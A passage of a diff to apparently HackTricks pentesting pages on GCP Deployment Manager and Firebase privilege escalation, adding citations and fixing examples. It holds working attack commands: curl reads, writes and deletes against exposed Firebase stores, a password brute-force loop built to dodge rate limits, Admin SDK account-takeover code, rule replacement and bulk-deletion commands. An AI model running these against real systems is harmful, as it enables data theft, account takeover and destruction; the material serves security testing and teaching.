+If the target role is grantable at that scope, this is like the previous abuse: instead of directly creating a new deployment, you first give yourself the required access and then abuse the permission as explained in the previous _deploymentmanager.deployments.create_ section. The API replaces the IAM policy on the specified deployment, so verify the target role and resource scope before relying on this path.<sup>[[5]](#references)[[8]](#references)</sup>
+
+Google currently lists `deploymentmanager.deployments.setIamPolicy` under Owner, Deployment Manager Admin, and Security Admin; its practical impact therefore depends on the effective role and resource scope in the project.<sup>[[9]](#references)</sup>
 
 ## References
 
-- [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
+- [1] [Privilege Escalation in Google Cloud Platform - Part 1 (IAM)](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
+- [2] [deploymentmanager.deployments.create.py](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/deploymentmanager.deployments.create.py)
+- [3] [1-deploymentmanager.deployments.create.sh](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/1-deploymentmanager.deployments.create.sh)
+- [4] [e-deploymentmanager.deployments.update.sh](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/e-deploymentmanager.deployments.update.sh)
+- [5] [Access control with IAM](https://docs.cloud.google.com/deployment-manager/docs/access-control)
+- [6] [Supported resource types](https://docs.cloud.google.com/deployment-manager/docs/configuration/supported-resource-types)
+- [7] [Updating a Deployment](https://docs.cloud.google.com/deployment-manager/docs/deployments/updating-deployments)
+- [8] [Deployments: setIamPolicy](https://docs.cloud.google.com/deployment-manager/docs/reference/latest/deployments/setIamPolicy)
+- [9] [Cloud Deployment Manager roles and permissions](https://docs.cloud.google.com/iam/docs/roles-permissions/deploymentmanager)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
 

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-firebase-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-firebase-privesc.md
@@ -1,33 +1,31 @@
 # GCP - Firebase Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Firebase
 
 ### Unauthenticated access to Firebase Realtime Database
-An attacker does not need any specific Firebase permissions to carry out this attack. It only requires that there is a vulnerable configuration in the Firebase Realtime Database security rules, where the rules are set with `.read: true` or `.write: true`, allowing public read or write access.
+An attacker does not need any specific Firebase permissions to carry out this attack. It only requires that there is a vulnerable configuration in the Firebase Realtime Database security rules, where the rules are set with `.read: true` or `.write: true`, allowing public read or write access.<sup>[[1]](#references)</sup>
 
-The attacker must identify the database URL, which typically follows the format: `https://<project-id>.firebaseio.com/`.
+The attacker must identify the database URL, which typically follows the format: `https://<project-id>.firebaseio.com/`.<sup>[[2]](#references)[[3]](#references)</sup>
 
-This URL can be found through mobile application reverse engineering (decompiling Android APKs or analyzing iOS apps), analyzing configuration files such as google-services.json (Android) or GoogleService-Info.plist (iOS), inspecting the source code of web applications, or examining network traffic to identify requests to `*.firebaseio.com` domains.
+This URL can be found through mobile application reverse engineering (decompiling Android APKs or analyzing iOS apps), analyzing configuration files such as google-services.json (Android) or GoogleService-Info.plist (iOS), inspecting the source code of web applications, or examining network traffic to identify requests to `*.firebaseio.com` domains.<sup>[[2]](#references)</sup>
 
 The attacker identifies the database URL and checks whether it is publicly exposed, then accesses the data and potentially writes malicious information.
 
-First, they check whether the database allows read access by appending .json to the URL.
+First, they check whether the database allows read access by appending `.json` to the URL.<sup>[[3]](#references)</sup>
 
 ```bash
 curl https://<project-id>-default-rtdb.firebaseio.com/.json
 ```
 
-If the response contains JSON data or null (instead of "Permission Denied"), the database allows read access. To check write access, the attacker can attempt to send a test write request using the Firebase REST API.
+If the response contains JSON data or null (instead of "Permission Denied"), the database allows read access. To check write access, the attacker can attempt to send a test write request using the Firebase REST API.<sup>[[4]](#references)</sup>
 ```bash
 curl -X PUT https://<project-id>-default-rtdb.firebaseio.com/test.json -d '{"test": "data"}'
 ```
-If the operation succeeds, the database also allows write access.
+If the operation succeeds, the database also allows write access.<sup>[[4]](#references)</sup>
 
 
 ### Exposure of data in Cloud Firestore
-An attacker does not need any specific Firebase permissions to carry out this attack. It only requires that there is a vulnerable configuration in the Cloud Firestore security rules where the rules allow read or write access without authentication or with insufficient validation. An example of a misconfigured rule that grants full access is:
+An attacker does not need any specific Firebase permissions to carry out this attack. It only requires that there is a vulnerable configuration in the Cloud Firestore security rules where the rules allow read or write access without authentication or with insufficient validation. An example of a misconfigured rule that grants full access is:<sup>[[5]](#references)</sup>
 ```bash
 service cloud.firestore {
   match /databases/{database}/documents/{document=**} {
@@ -35,26 +33,26 @@ service cloud.firestore {
   }
 }
 ```
-This rule allows anyone to read and write all documents without any restrictions. Firestore rules are granular and apply per collection and document, so an error in a specific rule may expose only certain collections.
+This rule allows anyone to read and write all documents without any restrictions. Firestore rules are granular and apply per collection and document, so an error in a specific rule may expose only certain collections.<sup>[[5]](#references)</sup>
 
-The attacker must identify the Firebase Project ID, which can be found through mobile app reverse engineering, analysis of configuration files such as google-services.json or GoogleService-Info.plist, inspecting the source code of web applications, or analyzing network traffic to identify requests to firestore.googleapis.com.
-The Firestore REST API uses the format:
+The attacker must identify the Firebase Project ID, which can be found through mobile app reverse engineering, analysis of configuration files such as google-services.json or GoogleService-Info.plist, inspecting the source code of web applications, or analyzing network traffic to identify requests to firestore.googleapis.com.<sup>[[2]](#references)</sup>
+The Firestore REST API uses the format:<sup>[[6]](#references)</sup>
 ```bash
 https://firestore.googleapis.com/v1/projects/<PROJECT_ID>/databases/(default)/documents/<collection>/<document>
 ```
 
-If the rules allow unauthenticated read access, the attacker can read collections and documents. First, they attempt to access a specific collection:
+If the rules allow unauthenticated read access, the attacker can read collections and documents. First, they attempt to access a specific collection:<sup>[[6]](#references)</sup>
 
 ```bash
 curl https://firestore.googleapis.com/v1/projects/<PROJECT_ID>/databases/(default)/documents/<collection>
 ```
 
-If the response contains JSON documents instead of a permission error, the collection is exposed. The attacker can enumerate all accessible collections by trying common names or analyzing the structure of the application. To access a specific document:
+If the response contains JSON documents instead of a permission error, the collection is exposed. The attacker can enumerate all accessible collections by trying common names or analyzing the structure of the application. To access a specific document:<sup>[[6]](#references)</sup>
 ```bash
 curl https://firestore.googleapis.com/v1/projects/<PROJECT_ID>/databases/(default)/documents/<collection>/<document>
 ```
 
-If the rules allow unauthenticated write access or have insufficient validation, the attacker can create new documents:
+If the rules allow unauthenticated write access or have insufficient validation, the attacker can create new documents:<sup>[[6]](#references)</sup>
 ```bash
 curl -X POST https://firestore.googleapis.com/v1/projects/<PROJECT_ID>/databases/(default)/documents/<collection> \
   -H "Content-Type: application/json" \
@@ -66,7 +64,7 @@ curl -X POST https://firestore.googleapis.com/v1/projects/<PROJECT_ID>/databases
   }'
 ```
 
-Para modificar un documento existente se debe utilizar PATCH:
+Para modificar un documento existente se debe utilizar PATCH:<sup>[[6]](#references)</sup>
 ```bash
 curl -X PATCH https://firestore.googleapis.com/v1/projects/<PROJECT_ID>/databases/(default)/documents/users/<user-id> \
   -H "Content-Type: application/json" \
@@ -76,62 +74,64 @@ curl -X PATCH https://firestore.googleapis.com/v1/projects/<PROJECT_ID>/database
     }
   }'
 ```
-Para eliminar un documento y causar denegación de servicio:
+Para eliminar un documento y causar denegación de servicio:<sup>[[6]](#references)</sup>
 ```bash
 curl -X DELETE https://firestore.googleapis.com/v1/projects/<PROJECT_ID>/databases/(default)/documents/<collection>/<document>
 ```
 
 
 ### Exposure of files in Firebase Storage
-An attacker does not need any specific Firebase permissions to carry out this attack. It only requires that there is a vulnerable configuration in the Firebase Storage security rules where the rules allow read or write access without authentication or with insufficient validation. Storage rules control read and write permissions independently, so an error in a rule may expose read access only, write access only, or both. An example of a misconfigured rule that grants full access is:
+An attacker does not need any specific Firebase permissions to carry out this attack. It only requires that there is a vulnerable configuration in the Firebase Storage security rules where the rules allow read or write access without authentication or with insufficient validation. Storage rules control read and write permissions independently, so an error in a rule may expose read access only, write access only, or both. An example of a misconfigured rule that grants full access is:<sup>[[7]](#references)</sup>
 ```bash
-service cloud.firestore {
-  match /databases/{database}/documents/{document=**} {
-    allow read, write: if true;
+service firebase.storage {
+  match /b/{bucket}/o {
+    match /{allPaths=**} {
+      allow read, write: if true;
+    }
   }
 }
 ```
-This rule allows read and write access to all documents without any restrictions. Firestore rules are granular and are applied per collection and per document, so an error in a specific rule may expose only certain collections. The attacker must identify the Firebase Project ID, which can be found through mobile application reverse engineering, analysis of configuration files such as google-services.json or GoogleService-Info.plist, inspection of web application source code, or network traffic analysis to identify requests to firestore.googleapis.com.
-The Firestore REST API uses the format:`https://firestore.googleapis.com/v1/projects/<PROJECT_ID>/databases/(default)/documents/<collection>/<document>.`
+This rule allows read and write access to all files without any restrictions. Storage rules can be scoped to paths, so an error in a specific rule may expose only certain objects. The attacker must identify the Firebase project and Storage bucket, which can be found through mobile application reverse engineering, analysis of configuration files such as google-services.json or GoogleService-Info.plist, inspection of web application source code, or network traffic analysis to identify requests to firebasestorage.googleapis.com.<sup>[[2]](#references)[[7]](#references)</sup>
+The Firebase Storage REST API uses the format `https://firebasestorage.googleapis.com/v0/b/<bucket>/o/<object>`.<sup>[[9]](#references)[[39]](#references)[[40]](#references)</sup>
 
-If the rules allow unauthenticated read access, the attacker can read collections and documents. First, they attempt to access a specific collection.
+If the rules allow unauthenticated read access, the attacker can list and download objects. First, they attempt to list objects in a bucket.<sup>[[7]](#references)[[8]](#references)[[10]](#references)</sup>
 ```bash
 curl "https://firebasestorage.googleapis.com/v0/b/<bucket>/o"
 curl "https://firebasestorage.googleapis.com/v0/b/<bucket>/o?prefix=<path>"
 ```
-If the response contains the list of files instead of a permission error, the file is exposed. The attacker can view the contents of the files by specifying their path:
+If the response contains the list of files instead of a permission error, the file is exposed. The attacker can view the contents of the files by specifying their path:<sup>[[8]](#references)[[9]](#references)[[40]](#references)</sup>
 ```bash
 curl "https://firebasestorage.googleapis.com/v0/b/<bucket>/o/<urlencode(path)>"
 ```
 
-If the rules allow unauthenticated write access or have insufficient validation, the attacker can upload malicious files. To upload a file through the REST API:
+If the rules allow unauthenticated write access or have insufficient validation, the attacker can upload malicious files. To upload a file through the REST API:<sup>[[7]](#references)[[11]](#references)[[39]](#references)[[40]](#references)</sup>
 ```bash
 curl -X POST "https://firebasestorage.googleapis.com/v0/b/<bucket>/o?name=<path>" \
   -H "Content-Type: <content-type>" \
   --data-binary @<local-file>
 ```
-The attacker can upload code shells, malware payloads, or large files to cause a denial of service. If the application processes or executes uploaded files, the attacker may achieve remote code execution. To delete files and cause a denial of service:
+The attacker can upload code shells, malware payloads, or large files to cause a denial of service. If the application processes or executes uploaded files, the attacker may achieve remote code execution. To delete files and cause a denial of service:<sup>[[7]](#references)[[12]](#references)[[39]](#references)[[40]](#references)</sup>
 ```bash
 curl -X DELETE "https://firebasestorage.googleapis.com/v0/b/<bucket>/o/<path>"
 ```
 
 
 ### Invocation of public Firebase Cloud Functions
-An attacker does not need any specific Firebase permissions to exploit this issue; it only requires that a Cloud Function is publicly accessible over HTTP without authentication.
+An attacker does not need any specific Firebase permissions to exploit this issue; it only requires that a Cloud Function is publicly accessible over HTTP without authentication.<sup>[[13]](#references)</sup>
 
 A function is vulnerable when it is insecurely configured:
 
-- It uses functions.https.onRequest, which does not enforce authentication (unlike onCall functions).
-- The function’s code does not validate user authentication (e.g., no checks for request.auth or context.auth).
-- The function is publicly accessible in IAM, meaning allUsers has the roles/cloudfunctions.invoker role. This is the default behavior for HTTP functions unless the developer restricts access.
+- It uses functions.https.onRequest, which does not enforce authentication by itself (unlike callable functions, whose protocol handles authentication tokens).<sup>[[13]](#references)[[14]](#references)</sup>
+- The function’s code does not validate user authentication (e.g., no checks for request.auth or context.auth).<sup>[[14]](#references)</sup>
+- The function is publicly accessible in IAM, meaning `allUsers` has an invoker role: `roles/cloudfunctions.invoker` for first-generation functions or `roles/run.invoker` for second-generation functions. HTTP functions require authentication by default unless the deployment or IAM policy allows unauthenticated access.<sup>[[15]](#references)[[38]](#references)</sup>
 
-Firebase HTTP Cloud Functions are exposed through URLs such as:
+Firebase HTTP Cloud Functions are exposed through URLs such as:<sup>[[13]](#references)[[16]](#references)</sup>
 
 - `https://<region>-<project-id>.cloudfunctions.net/<function-name>`
 - `https://<project-id>.web.app/<function-name>` (when integrated with Firebase Hosting)
 
 An attacker can discover these URLs through source code analysis, network traffic inspection, enumeration tools, or mobile app reverse engineering.
-If the function is publicly exposed and unauthenticated, the attacker can invoke it directly without credentials.
+If the function is publicly exposed and unauthenticated, the attacker can invoke it directly without credentials.<sup>[[13]](#references)[[15]](#references)[[38]](#references)</sup>
 
 ```bash
 # Invoke public HTTP function with GET
@@ -145,19 +145,19 @@ If the function does not properly validate inputs, the attacker may attempt othe
 
 
 ### Brute-force attack against Firebase Authentication with a weak password policy
-An attacker does not need any specific Firebase permissions to carry out this attack. It only requires that the Firebase API Key is exposed in mobile or web applications, and that the password policy has not been configured with stricter requirements than the defaults.
+An attacker does not need any specific Firebase permissions to carry out this attack. It only requires that the Firebase API key is exposed in mobile or web applications, and that the password policy has not been configured with stricter requirements than the defaults. Firebase API keys identify a project and are normally included in client configuration; the key is not, by itself, an authorization credential.<sup>[[17]](#references)[[20]](#references)</sup>
 
-The attacker must identify the Firebase API Key, which can be found through mobile app reverse engineering, analysis of configuration files such as google-services.json or GoogleService-Info.plist, inspecting the source code of web applications (e.g., in bootstrap.js), or analyzing network traffic.
+The attacker must identify the Firebase API key, which can be found through mobile app reverse engineering, analysis of configuration files such as google-services.json or GoogleService-Info.plist, inspecting the source code of web applications (e.g., in bootstrap.js), or analyzing network traffic.<sup>[[2]](#references)[[17]](#references)</sup>
 
 Firebase Authentication’s REST API uses the endpoint:
 `https://identitytoolkit.googleapis.com/v1/accounts:signInWithPassword?key=<API_KEY>`
-to authenticate with email and password.
+to authenticate with email and password.<sup>[[18]](#references)</sup>
 
-If Email Enumeration Protection is disabled, API error responses can reveal whether an email exists in the system (EMAIL_NOT_FOUND vs. INVALID_PASSWORD), which allows attackers to enumerate users before attempting password guessing. When this protection is enabled, the API returns the same error message for both nonexistent emails and incorrect passwords, preventing user enumeration.
+If Email Enumeration Protection is disabled, API error responses can reveal whether an email exists in the system (EMAIL_NOT_FOUND vs. INVALID_PASSWORD), which allows attackers to enumerate users before attempting password guessing. When this protection is enabled, failed sign-ins use the generic INVALID_LOGIN_CREDENTIALS response instead, preventing this form of user enumeration.<sup>[[18]](#references)[[19]](#references)</sup>
 
-It is important to note that Firebase Authentication enforces rate limiting, which can block requests if too many authentication attempts occur in a short time. Because of this, an attacker would have to introduce delays between attempts to avoid being rate-limited.
+It is important to note that Firebase Authentication enforces rate limiting and abuse protections, which can block requests if too many authentication attempts occur in a short time. Because of this, an attacker would have to introduce delays between attempts to avoid being rate-limited.<sup>[[21]](#references)</sup>
 
-The attacker identifies the API Key and performs authentication attempts with multiple passwords against known accounts. If Email Enumeration Protection is disabled, the attacker can enumerate existing users by analyzing the error responses:
+The attacker identifies the API key and performs authentication attempts with multiple passwords against known accounts. If Email Enumeration Protection is disabled, the attacker can enumerate existing users by analyzing the error responses:<sup>[[18]](#references)[[19]](#references)</sup>
 ```bash
 # Attempt authentication with a known email and an incorrect password
 curl -X POST "https://identitytoolkit.googleapis.com/v1/accounts:signInWithPassword?key=<API_KEY>" \
@@ -169,7 +169,7 @@ curl -X POST "https://identitytoolkit.googleapis.com/v1/accounts:signInWithPassw
   }'
 ```
 
-If the response contains EMAIL_NOT_FOUND, the email does not exist in the system. If it contains INVALID_PASSWORD, the email exists but the password is incorrect, confirming that the user is registered. Once a valid user is identified, the attacker can perform brute-force attempts. It is important to include pauses between attempts to avoid Firebase Authentication’s rate-limiting mechanisms:
+If the response contains EMAIL_NOT_FOUND, the email does not exist in the system. If it contains INVALID_PASSWORD, the email exists but the password is incorrect, confirming that the user is registered. Once a valid user is identified, the attacker can perform brute-force attempts. It is important to include pauses between attempts to avoid Firebase Authentication’s rate-limiting mechanisms.<sup>[[18]](#references)[[19]](#references)[[21]](#references)</sup>
 ```bash
 counter=1
 for password in $(cat wordlist.txt); do
@@ -188,11 +188,11 @@ for password in $(cat wordlist.txt); do
   counter=$((counter + 1))
 done
 ```
-With the default password policy (minimum 6 characters, no complexity requirements), the attacker can try all possible combinations of 6-character passwords, which represents a relatively small search space compared to stricter password policies.
+With the default password policy (minimum 6 characters, no complexity requirements), the attacker can try all possible combinations of 6-character passwords, which represents a relatively small search space compared to stricter password policies.<sup>[[20]](#references)</sup>
 
 ### User management in Firebase Authentication
 
-The attacker needs specific Firebase Authentication permissions to carry out this attack. The required permissions are:
+The attacker needs specific Firebase Authentication permissions to carry out this attack. The required permissions are:<sup>[[24]](#references)</sup>
 
 - `firebaseauth.users.create` to create users
 - `firebaseauth.users.update` to modify existing users
@@ -201,18 +201,18 @@ The attacker needs specific Firebase Authentication permissions to carry out thi
 - `firebaseauth.users.sendEmail` to send emails to users
 - `firebaseauth.users.createSession` to create user sessions
 
-These permissions are included in the `roles/firebaseauth.admin` role, which grants full read/write access to Firebase Authentication resources. They are also included in higher-level roles such as roles/firebase.developAdmin (which includes all firebaseauth.* permissions) and roles/firebase.admin (full access to all Firebase services).
+These permissions are included in the `roles/firebaseauth.admin` role, which grants full read/write access to Firebase Authentication resources. They are also included in higher-level roles such as `roles/firebase.developAdmin` (which includes all `firebaseauth.*` permissions) and `roles/firebase.admin` (full access to all Firebase services).<sup>[[24]](#references)[[25]](#references)</sup>
 
 To use the Firebase Admin SDK, the attacker would need access to service account credentials (JSON file), which might be found on compromised systems, publicly exposed code repositories, compromised CI/CD systems, or through the compromise of developer accounts that have access to these credentials.
 
-The first step is to configure the Firebase Admin SDK using service account credentials.
+The first step is to configure the Firebase Admin SDK using service account credentials.<sup>[[22]](#references)[[26]](#references)</sup>
 ```bash
 import firebase_admin
 from firebase_admin import credentials, auth
 cred = credentials.Certificate('path/to/serviceAccountKey.json')
 firebase_admin.initialize_app(cred)
 ```
-To create a malicious user using a victim’s email, the attacker would attempt to use the Firebase Admin SDK to generate a new account under that email.
+To create a malicious user using a victim’s email, the attacker would attempt to use the Firebase Admin SDK to generate a new account under that email.<sup>[[22]](#references)[[23]](#references)</sup>
 ```bash
 user = auth.create_user(
     email='victima@example.com',
@@ -223,7 +223,7 @@ user = auth.create_user(
 )
 print(f'Usuario creado: {user.uid}')
 ```
-To modify an existing user, the attacker would update fields such as the email address, verification status, or whether the account is disabled.
+To modify an existing user, the attacker would update fields such as the email address, verification status, or whether the account is disabled.<sup>[[22]](#references)[[23]](#references)</sup>
 ```bash
 user = auth.update_user(
     uid,
@@ -233,81 +233,19 @@ user = auth.update_user(
 )
 print(f'Usuario actualizado: {user.uid}')
 ```
-To delete a user account and cause a denial of service, the attacker would issue a request to remove the user entirely.
+To delete a user account and cause a denial of service, the attacker would issue a request to remove the user entirely.<sup>[[22]](#references)[[23]](#references)</sup>
 ```bash
 auth.delete_user(uid)
 print('Usuario eliminado exitosamente')
 ```
-The attacker can also retrieve information about existing users by requesting their UID or email address.
+The attacker can also retrieve information about existing users by requesting their UID or email address.<sup>[[22]](#references)[[23]](#references)</sup>
 ```bash
 user = auth.get_user(uid)
 print(f'Información del usuario: {user.uid}, {user.email}')
 user = auth.get_user_by_email('usuario@example.com')
 print(f'Información del usuario: {user.uid}, {user.email}')
 ```
-Additionally, the attacker could generate verification links or password-reset links in order to change a user’s password and gain access to their account.
-```bash
-link = auth.generate_email_verification_link(email)
-print(f'Link de verificación: {link}')
-link = auth.generate_password_reset_link(email)
-print(f'Link de reset: {link}')
-```
-
-### User management in Firebase Authentication
-An attacker needs specific Firebase Authentication permissions to carry out this attack. The required permissions are:
-
-- `firebaseauth.users.create` to create users
-- `firebaseauth.users.update` to modify existing users
-- `firebaseauth.users.delete` to delete users
-- `firebaseauth.users.get` to obtain user information
-- `firebaseauth.users.sendEmail` to send emails to users
-- `firebaseauth.users.createSession` to create user sessions
-
-These permissions are included in the roles/firebaseauth.admin role, which grants full read/write access to Firebase Authentication resources. They are also part of higher-level roles such as `roles/firebase.developAdmin` (which includes all firebaseauth.* permissions) and `roles/firebase.admin` (full access to all Firebase services).
-
-To use the Firebase Admin SDK, the attacker would need access to service account credentials (a JSON file), which could be obtained from compromised systems, publicly exposed code repositories, compromised CI/CD environments, or through the compromise of developer accounts that have access to these credentials.
-
-The first step is to configure the Firebase Admin SDK using service account credentials.
-```bash
-import firebase_admin
-from firebase_admin import credentials, auth
-cred = credentials.Certificate('path/to/serviceAccountKey.json')
-firebase_admin.initialize_app(cred)
-```
-To create a malicious user using a victim’s email, the attacker would attempt to create a new user account with that email, assigning their own password and profile information.
-```bash
-user = auth.create_user(
-    email='victima@example.com',
-    email_verified=False,
-    password='password123',
-    display_name='Usuario Malicioso',
-    disabled=False
-)
-print(f'Usuario creado: {user.uid}')
-```
-To modify an existing user, the attacker would change fields such as the email address, verification status, or whether the account is disabled.
-```bash
-user = auth.update_user(
-    uid,
-    email='nuevo-email@example.com',
-    email_verified=True,
-    disabled=False
-)
-print(f'Usuario actualizado: {user.uid}')
-```
-To delete a user account—effectively causing a denial of service—the attacker would issue a request to remove that user permanently.
-```bash
-auth.delete_user(uid)
-print('Usuario eliminado exitosamente')
-```
-The attacker could also retrieve information about existing users, such as their UID or email, by requesting user details either by UID or by email address.
-```bash
-user = auth.get_user(uid)
-print(f'Información del usuario: {user.uid}, {user.email}')
-user = auth.get_user_by_email('usuario@example.com')
-print(f'Información del usuario: {user.uid}, {user.email}')
-```
-Additionally, the attacker could generate verification links or password-reset links, enabling them to change the password of a user and take control of the account.
+Additionally, the attacker could generate verification links or password-reset links in order to change a user’s password and gain access to their account.<sup>[[23]](#references)</sup>
 ```bash
 link = auth.generate_email_verification_link(email)
 print(f'Link de verificación: {link}')
@@ -316,17 +254,17 @@ print(f'Link de reset: {link}')
 ```
 
 ### Modification of security rules in Firebase services
-The attacker needs specific permissions to modify security rules depending on the service. For Cloud Firestore and Firebase Cloud Storage, the required permissions are `firebaserules.rulesets.create` to create rulesets and `firebaserules.releases.create` to deploy releases. These permissions are included in the `roles/firebaserules.admin` role or in higher-level roles such as `roles/firebase.developAdmin` and `roles/firebase.admin`. For Firebase Realtime Database, the required permission is `firebasedatabase.instances.update`.
+The attacker needs specific permissions to modify security rules depending on the service. For Cloud Firestore and Firebase Cloud Storage, the required permissions are `firebaserules.rulesets.create` to create rulesets and `firebaserules.releases.create` to deploy releases. These permissions are included in the `roles/firebaserules.admin` role or in higher-level roles such as `roles/firebase.developAdmin` and `roles/firebase.admin`. For Firebase Realtime Database, the required permission is `firebasedatabase.instances.update`.<sup>[[25]](#references)[[27]](#references)[[28]](#references)[[29]](#references)</sup>
 
-The attacker must use the Firebase REST API to modify the security rules.
-First, the attacker would need to obtain an access token using service account credentials.
-To obtain the token:
+The attacker must use the Firebase REST API to modify the security rules.<sup>[[27]](#references)</sup>
+First, the attacker would need to obtain an access token using service account credentials.<sup>[[26]](#references)</sup>
+To obtain the token:<sup>[[26]](#references)</sup>
 ```bash
 gcloud auth activate-service-account --key-file=path/to/serviceAccountKey.json
 ACCESS_TOKEN=$(gcloud auth print-access-token)
 ```
 
-To modify Firebase Realtime Database rules:
+To modify Firebase Realtime Database rules:<sup>[[3]](#references)[[27]](#references)</sup>
 ```bash
 curl -X PUT "https://<project-id>-default-rtdb.firebaseio.com/.settings/rules.json?access_token=$ACCESS_TOKEN" \
   -H "Content-Type: application/json" \
@@ -337,7 +275,7 @@ curl -X PUT "https://<project-id>-default-rtdb.firebaseio.com/.settings/rules.js
     }
   }'
 ```
-To modify Cloud Firestore rules, the attacker must create a ruleset and then deploy it:
+To modify Cloud Firestore rules, the attacker must create a ruleset and then deploy it:<sup>[[27]](#references)</sup>
 ```bash
 curl -X POST "https://firebaserules.googleapis.com/v1/projects/<project-id>/rulesets" \
   -H "Authorization: Bearer $ACCESS_TOKEN" \
@@ -351,7 +289,7 @@ curl -X POST "https://firebaserules.googleapis.com/v1/projects/<project-id>/rule
     }
   }'
 ```
-The previous command returns a ruleset name in the format projects/<project-id>/rulesets/<ruleset-id>. To deploy the new version, the release must be updated using a PATCH request:
+The previous command returns a ruleset name in the format projects/<project-id>/rulesets/<ruleset-id>. To deploy the new version, the release must be updated using a PATCH request:<sup>[[27]](#references)</sup>
 ```bash
 curl -X PATCH "https://firebaserules.googleapis.com/v1/projects/<project-id>/releases/cloud.firestore" \
   -H "Authorization: Bearer $ACCESS_TOKEN" \
@@ -363,7 +301,7 @@ curl -X PATCH "https://firebaserules.googleapis.com/v1/projects/<project-id>/rel
     }
   }'
 ```
-To modify Firebase Cloud Storage rules:
+To modify Firebase Cloud Storage rules:<sup>[[27]](#references)</sup>
 ```bash
 curl -X POST "https://firebaserules.googleapis.com/v1/projects/<project-id>/rulesets" \
   -H "Authorization: Bearer $ACCESS_TOKEN" \
@@ -377,7 +315,7 @@ curl -X POST "https://firebaserules.googleapis.com/v1/projects/<project-id>/rule
     }
   }'
 ```
-The previous command returns a ruleset name in the format projects/<project-id>/rulesets/<ruleset-id>. To deploy the new version, the release must be updated using a PATCH request:
+The previous command returns a ruleset name in the format projects/<project-id>/rulesets/<ruleset-id>. To deploy the new version, the release must be updated using a PATCH request:<sup>[[27]](#references)</sup>
 ```bash
 curl -X PATCH "https://firebaserules.googleapis.com/v1/projects/<project-id>/releases/firebase.storage/<bucket-id>" \
   -H "Authorization: Bearer $ACCESS_TOKEN" \
@@ -391,16 +329,16 @@ curl -X PATCH "https://firebaserules.googleapis.com/v1/projects/<project-id>/rel
 ```
 
 ### Data exfiltration and manipulation in Cloud Firestore
-Cloud Firestore uses the same infrastructure and permission system as Cloud Datastore, so Datastore IAM permissions apply directly to Firestore. To manipulate TTL policies, the `datastore.indexes.update` permission is required. To export data, the `datastore.databases.export` permission is required. To import data, the datastore.databases.import permission is required. To perform bulk data deletion, the `datastore.databases.bulkDelete` permission is required.
+Cloud Firestore uses the same infrastructure and permission system as Cloud Datastore, so Datastore IAM permissions apply directly to Firestore. To manipulate TTL policies, the `datastore.indexes.update` permission is required. To export data, the `datastore.databases.export` permission is required. To import data, the `datastore.databases.import` permission is required. To perform bulk data deletion, the `datastore.databases.bulkDelete` permission is required.<sup>[[30]](#references)[[34]](#references)</sup>
 
-For backup and restore operations, specific permissions are needed:
+For backup and restore operations, specific permissions are needed:<sup>[[33]](#references)[[34]](#references)</sup>
 
 - `datastore.backups.get` and `datastore.backups.list` to list and retrieve details of available backups
 - `datastore.backups.delete` to delete backups
 - `datastore.backups.restoreDatabase` to restore a database from a backup
-- `datastore.backupSchedules.create` and `datastore.backupSchedules.delete` to manage backup schedules
+- `datastore.backupSchedules.create` and `datastore.backupSchedules.delete` to manage backup schedules<sup>[[33]](#references)[[34]](#references)</sup>
 
-When a TTL policy is created, a designated property is selected to identify entities that are eligible for deletion. This TTL property must be of the Date and time type. The attacker can choose a property that already exists or designate a property that they plan to add later. If the value of the field is a date in the past, the document becomes eligible for immediate deletion. The attacker can use the gcloud CLI to manipulate TTL policies.
+When a TTL policy is created, a designated property is selected to identify entities that are eligible for deletion. This TTL property must be of the Date and time type. The attacker can choose a property that already exists or designate a property that they plan to add later. If the value of the field is a date in the past, the document becomes eligible for immediate deletion. The attacker can use the gcloud CLI to manipulate TTL policies.<sup>[[30]](#references)</sup>
 ```bash
 # Enable TTL 
 gcloud firestore fields ttls update expireAt \
@@ -411,24 +349,24 @@ gcloud firestore fields ttls update expireAt \
   --collection-group=users \
   --disable-ttl
 ```
-To export data and exfiltrate it, the attacker could use the gcloud CLI.
+To export data and exfiltrate it, the attacker could use the gcloud CLI.<sup>[[31]](#references)</sup>
 ```bash
 gcloud firestore export gs://<bucket-name> --project=<project-id> --async --database='(default)'
 ```
 
-To import malicious data:
+To import malicious data:<sup>[[31]](#references)</sup>
 ```bash
 gcloud firestore import gs://<bucket-name>/<path> --project=<project-id> --async --database='(default)'
 ```
 
-To perform mass data deletion and cause a denial of service, the attacker could use the gcloud Firestore bulk-delete tool to remove entire collections.
+To perform mass data deletion and cause a denial of service, the attacker could use the gcloud Firestore bulk-delete tool to remove entire collections.<sup>[[32]](#references)</sup>
 ```bash
 gcloud firestore bulk-delete \
   --collection-ids=users,posts,messages \
   --database='(default)' \
   --project=<project-id>
 ```
-For backup and restoration operations, the attacker could create scheduled backups to capture the current state of the database, list existing backups, restore from a backup to overwrite recent changes, delete backups to cause permanent data loss, and remove scheduled backups.
+For backup and restoration operations, the attacker could create scheduled backups to capture the current state of the database, list existing backups, restore from a backup to overwrite recent changes, delete backups to cause permanent data loss, and remove scheduled backups.<sup>[[33]](#references)</sup>
 To create a daily backup schedule that immediately generates a backup:
 ```bash
 gcloud firestore backups schedules create \
@@ -437,14 +375,14 @@ gcloud firestore backups schedules create \
   --retention=14w \
   --project=<project-id>
 ```
-To restore from a specific backup, the attacker could create a new database using the data contained in that backup. The restore operation writes the backup’s data into a new database, meaning that an existing DATABASE_ID cannot be used.
+To restore from a specific backup, the attacker could create a new database using the data contained in that backup. The restore operation writes the backup’s data into a new database, meaning that an existing DATABASE_ID cannot be used.<sup>[[33]](#references)</sup>
 ```bash
 gcloud firestore databases restore \
   --source-backup=projects/<project-id>/locations/<location>/backups/<backup-id> \
   --destination-database='<new-database-id>' \
   --project=<project-id>
 ```
-To delete a backup and cause permanent data loss:
+To delete a backup and cause permanent data loss:<sup>[[33]](#references)</sup>
 ```bash
 gcloud firestore backups delete \
   --backup=<backup-id> \
@@ -452,19 +390,60 @@ gcloud firestore backups delete \
 ```
 
 ### Theft and misuse of Firebase CLI credentials
